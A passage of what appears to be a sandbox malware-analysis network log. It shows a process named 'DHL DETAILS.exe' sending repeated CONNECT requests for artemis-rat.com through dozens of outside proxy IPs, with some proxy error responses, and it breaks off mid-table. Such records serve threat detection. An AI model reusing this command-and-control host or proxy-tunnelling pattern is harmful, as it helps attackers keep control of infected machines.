                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1736192.168.2.55524738.54.101.25431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.736210108 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1737192.168.2.555237106.105.218.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.737844944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1738192.168.2.555223123.241.210.123806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.752496958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.226191998 CET326INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1739192.168.2.553605164.92.86.113602836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.778981924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1740192.168.2.55116454.36.122.16171886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.782305002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1741192.168.2.553610147.124.212.3146716352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.797590971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1742192.168.2.55465145.191.75.1869996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.801628113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1743192.168.2.555097117.160.250.13288996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.822427988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.605290890 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1744192.168.2.55524394.130.94.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.834474087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1745192.168.2.55524439.99.144.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.860847950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.202697039 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1746192.168.2.5552468.219.179.237156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.884097099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1747192.168.2.55524143.231.22.228806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.884490013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1748192.168.2.55458543.255.113.23280836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.888245106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.240161896 CET208INHTTP/1.0 404 Not Found
                                                                                    Server: HCS
                                                                                    Date: Sat, 09 Mar 2024 15:01:47 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 432
                                                                                    HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                    X-NGAA: MISS from CH-XW-NO1-315.3
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1749192.168.2.555250114.156.77.10780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.900216103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1750192.168.2.55472545.81.232.17532886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.905081034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1751192.168.2.554759161.97.163.52320926352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.908263922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.067488909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1752192.168.2.554798107.148.201.157806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.976619005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.020688057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.020576000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1753192.168.2.55485845.173.12.14119946352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.977955103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.020787001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.055989981 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1754192.168.2.554612182.48.77.17386746352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.979060888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1755192.168.2.55525343.155.170.35156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.992398024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1756192.168.2.555252185.101.16.52806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.996788979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1757192.168.2.55478445.65.137.2189996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.010145903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1758192.168.2.554908219.71.216.78806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.022622108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1759192.168.2.555255139.224.64.19180816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.025734901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.351807117 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1760192.168.2.555254103.118.46.17780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.031126976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1761192.168.2.55485961.178.152.3173026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.063056946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.419333935 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1762192.168.2.555251103.109.59.20910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.090662956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1763192.168.2.555257201.13.147.16156786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.100980997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1764192.168.2.555256119.23.148.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.105396032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1765192.168.2.5552618.217.44.229156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.148400068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1766192.168.2.55498282.65.240.11131286352C:\Users\user\Desktop\DHL DETAILS.exe
